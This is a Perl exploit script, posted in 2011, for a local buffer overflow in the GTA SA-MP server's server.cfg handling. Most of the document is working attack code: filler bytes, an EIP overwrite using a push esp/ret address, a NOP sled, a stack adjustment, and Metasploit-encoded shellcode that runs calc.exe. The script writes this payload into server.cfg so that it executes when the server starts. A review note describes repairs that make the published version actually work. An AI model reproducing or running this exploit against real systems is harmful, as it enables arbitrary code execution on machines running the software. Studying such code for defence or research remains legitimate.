
GTA SA-MP server.cfg Buffer Overflow

Posted on 27 September 2011

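#!/usr/bin/perl
# GTA SA-MP server.cfg Local Buffer Overflow Vulnerability (0day)
# Date: 9-26-11
# Author: Silent_Dream
# Software Link: http://team.sa-mp.com/files/samp03csvr_R2-2_win32.zip
# Tested on: XP SP3, Windows 7
# Thanks to: corelanc0d3r & team, Metasploit, Exploit-db.
#
# No PPRs found (app compiled with safeseh on), so this exploit uses a
# plain EIP overwrite instead of an SEH overwrite.
# 392 bytes max payload space after the return address (past that you
# hit the SEH record); 3 badchars: 0x1a, 0x0d, 0x0a.
#
# Triggering: this script writes the payload to ./server.cfg -- it
# clobbers any existing server.cfg in the current directory, so run it
# in the server's scratch copy -- then start samp-server.exe and the
# calc.exe payload pops.
#
# Review note: the published listing had every "\x" escape stripped
# ("x41" x 379, "xaax9fx42x00", ...), so it would have written literal
# ASCII instead of bytes; the escapes are restored below. The original
# also opened $File and closed $FILE (a different, never-opened handle)
# with no error checking. The script now refuses to write a payload that
# contains a badchar or overruns the 392-byte window.
use strict;
use warnings;

# Layout constants, all taken from the original PoC.
my $FILE_NAME   = 'server.cfg';   # must be named server.cfg for the bug to trigger
my $HEAD        = 'echo ';        # probably not needed; tweak if you want
my $JUNK_LEN    = 379;            # filler bytes before EIP
my $EIP         = "\xaa\x9f\x42\x00";   # push esp / ret in samp-server.exe
my $NOP_LEN     = 12;
my $ADJUST      = "\x81\xc4\x54\xf2\xff\xff";   # add esp, -3500 (presumably to keep the decoder's stack writes away from the payload -- not stated in the original)
my $MAX_PAYLOAD = 392;            # bytes available after EIP before the SEH record
my @BADCHARS    = ("\x1a", "\x0d", "\x0a");

# x86/shikata_ga_nai succeeded with size 227 (iteration=1)
# Metasploit windows/exec calc.exe -b '\x1a\x0d\x0a'
my $SHELLCODE =
    "\xdb\xc3\xd9\x74\x24\xf4\xbe\xe8\x5a\x27\x13\x5f\x31\xc9" .
    "\xb1\x33\x31\x77\x17\x83\xc7\x04\x03\x9f\x49\xc5\xe6\xa3" .
    "\x86\x80\x09\x5b\x57\xf3\x80\xbe\x66\x21\xf6\xcb\xdb\xf5" .
    "\x7c\x99\xd7\x7e\xd0\x09\x63\xf2\xfd\x3e\xc4\xb9\xdb\x71" .
    "\xd5\x0f\xe4\xdd\x15\x11\x98\x1f\x4a\xf1\xa1\xd0\x9f\xf0" .
    "\xe6\x0c\x6f\xa0\xbf\x5b\xc2\x55\xcb\x19\xdf\x54\x1b\x16" .
    "\x5f\x2f\x1e\xe8\x14\x85\x21\x38\x84\x92\x6a\xa0\xae\xfd" .
    "\x4a\xd1\x63\x1e\xb6\x98\x08\xd5\x4c\x1b\xd9\x27\xac\x2a" .
    "\x25\xeb\x93\x83\xa8\xf5\xd4\x23\x53\x80\x2e\x50\xee\x93" .
    "\xf4\x2b\x34\x11\xe9\x8b\xbf\x81\xc9\x2a\x13\x57\x99\x20" .
    "\xd8\x13\xc5\x24\xdf\xf0\x7d\x50\x54\xf7\x51\xd1\x2e\xdc" .
    "\x75\xba\xf5\x7d\x2f\x66\x5b\x81\x2f\xce\x04\x27\x3b\xfc" .
    "\x51\x51\x66\x6a\xa7\xd3\x1c\xd3\xa7\xeb\x1e\x73\xc0\xda" .
    "\x95\x1c\x97\xe2\x7f\x59\x67\xa9\x22\xcb\xe0\x74\xb7\x4e" .
    "\x6d\x87\x6d\x8c\x88\x04\x84\x6c\x6f\x14\xed\x69\x2b\x92" .
    "\x1d\x03\x24\x77\x22\xb0\x45\x52\x41\x57\xd6\x3e\xa8\xf2" .
    "\x5e\xa4\xb4";

# Assemble the server.cfg contents: head, filler up to EIP, the
# push esp/ret address, a NOP sled, the esp adjustment, then the
# encoded payload. Returns the byte string; dies if the part after EIP
# does not fit in the 392-byte window or if any badchar is present
# anywhere in the buffer (the whole file is what the parser sees).
sub build_payload {
    my $after_eip = ("\x90" x $NOP_LEN) . $ADJUST . $SHELLCODE;
    if (length($after_eip) > $MAX_PAYLOAD) {
        die sprintf("payload after EIP is %d bytes, exceeds the %d-byte window before SEH\n",
            length($after_eip), $MAX_PAYLOAD);
    }

    my $buf = $HEAD . ("\x41" x $JUNK_LEN) . $EIP . $after_eip;
    for my $bad (@BADCHARS) {
        my $pos = index $buf, $bad;
        if ($pos >= 0) {
            die sprintf("badchar 0x%02x at offset %d -- re-encode the payload\n", ord($bad), $pos);
        }
    }
    return $buf;
}

# Write the raw payload bytes to $path, dying on any I/O failure.
# Returns the number of bytes written.
sub write_payload {
    my ($path, $bytes) = @_;
    open my $fh, '>', $path or die "open $path: $!\n";
    binmode $fh;    # raw bytes: no CRLF translation on the Windows targets this was tested on
    print {$fh} $bytes or die "write $path: $!\n";
    close $fh or die "close $path: $!\n";
    return length $bytes;
}

# Only write the file when run as a script, so the builder can be
# required/tested without touching server.cfg.
unless (caller) {
    my $n = write_payload($FILE_NAME, build_payload());
    print "wrote $n bytes to $FILE_NAME\n";
}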

 
